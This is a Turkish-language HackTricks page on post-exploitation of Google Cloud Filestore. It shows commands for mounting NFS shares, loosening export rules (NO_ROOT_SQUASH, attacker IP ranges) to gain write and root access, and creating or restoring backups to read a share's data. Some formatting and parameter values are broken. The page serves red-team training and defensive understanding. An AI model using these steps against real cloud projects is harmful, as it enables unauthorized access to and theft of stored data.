GCP - Filestore Sömürü Sonrası

Tip

AWS Hacking’i öğrenin ve pratik yapın:HackTricks Training AWS Red Team Expert (ARTE)
GCP Hacking’i öğrenin ve pratik yapın: HackTricks Training GCP Red Team Expert (GRTE)
Az Hacking’i öğrenin ve pratik yapın: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks'i Destekleyin

Filestore

Filestore hakkında daha fazla bilgi için bakınız:

GCP - Filestore Enum

Mount Filestore

Paylaşılan bir dosya sistemi, saldırgan açısından ilgi çekici olabilecek hassas bilgiler içerebilir. Filestore’a erişimle bunu bağlamak mümkündür:

Filestore dosya sistemini bağlama ```bash sudo apt-get update sudo apt-get install nfs-common # Check the share name showmount -e # Mount the share mkdir /mnt/fs sudo mount [FILESTORE_IP]:/[FILE_SHARE_NAME] /mnt/fs ```

Bir Filestore instance’ın IP address’ini bulmak için sayfadaki enumeration bölümünü kontrol edin:

GCP - Filestore Enum

Kısıtlamaları kaldırma ve ek izinler alma

Eğer attacker, share üzerinde erişimi olan bir IP address’te değilse, ancak onu değiştirmek için yeterli permissions’a sahipseniz, kısıtlamaları veya erişimi kaldırmak mümkün olabilir. Ayrıca IP address’inize daha fazla ayrıcalık vererek share üzerinde admin access elde etmek de mümkün olabilir:

Filestore instance'ını erişime izin verecek şekilde güncelle ```bash gcloud filestore instances update nfstest \ --zone= \ --flags-file=nfs.json

Contents of nfs.json

{ “–file-share”: { “capacity”: “1024”, “name”: “”, “nfs-export-options”: [ { “access-mode”: “READ_WRITE”, “ip-ranges”: [ “/32” ], “squash-mode”: “NO_ROOT_SQUASH”, “anon_uid”: 1003, “anon_gid”: 1003 } ] } }

</details>

### Yedeği geri yükleme

Bir yedek varsa, mevcut bir instance'a veya yeni bir instance'a **geri yükleyerek** onun **bilgilerine erişmek** mümkündür:

<details>

<summary>Yeni instance oluştur ve yedeği geri yükle</summary>
```bash
# Create a new filestore if you don't want to modify the old one
gcloud filestore instances create <new-instance-name> \
--zone=<zone> \
--tier=STANDARD \
--file-share=name=vol1,capacity=1TB \
--network=name=default,reserved-ip-range=10.0.0.0/29

# Restore a backups in a new instance
gcloud filestore instances restore <new-instance-name> \
--zone=<zone> \
--file-share=<instance-file-share-name> \
--source-backup=<backup-name> \
--source-backup-region=<backup-region>

# Follow the previous section commands to mount it

Yedek oluşturma ve geri yükleme

Eğer bir paylaşıma erişiminiz yoksa ve onu değiştirmek istemiyorsanız, ona yedek oluşturmak ve daha önce bahsedildiği gibi geri yüklemek mümkündür:

Yeni instance'da yedek oluşturma ve geri yükleme ```bash # Create share backup gcloud filestore backups create \ --region= \ --instance= \ --instance-zone= \ --file-share=

Follow the previous section commands to restore it and mount it

</details>

> [!TIP]
> AWS Hacking'i öğrenin ve pratik yapın:<img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://hacktricks-training.com/courses/arte)<img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">\
> GCP Hacking'i öğrenin ve pratik yapın: <img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training GCP Red Team Expert (GRTE)**](https://hacktricks-training.com/courses/grte)<img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">\
> Az Hacking'i öğrenin ve pratik yapın: <img src="../../../../../images/azrte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training Azure Red Team Expert (AzRTE)**](https://hacktricks-training.com/courses/azrte)<img src="../../../../../images/azrte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">
>
> <details>
>
> <summary>HackTricks'i Destekleyin</summary>
>
> - [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
> - **Katılın** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) veya [**telegram group**](https://t.me/peass) veya **Twitter**'da bizi **takip edin** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
> - **PR göndererek hacking tricks paylaşın:** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
>
> </details>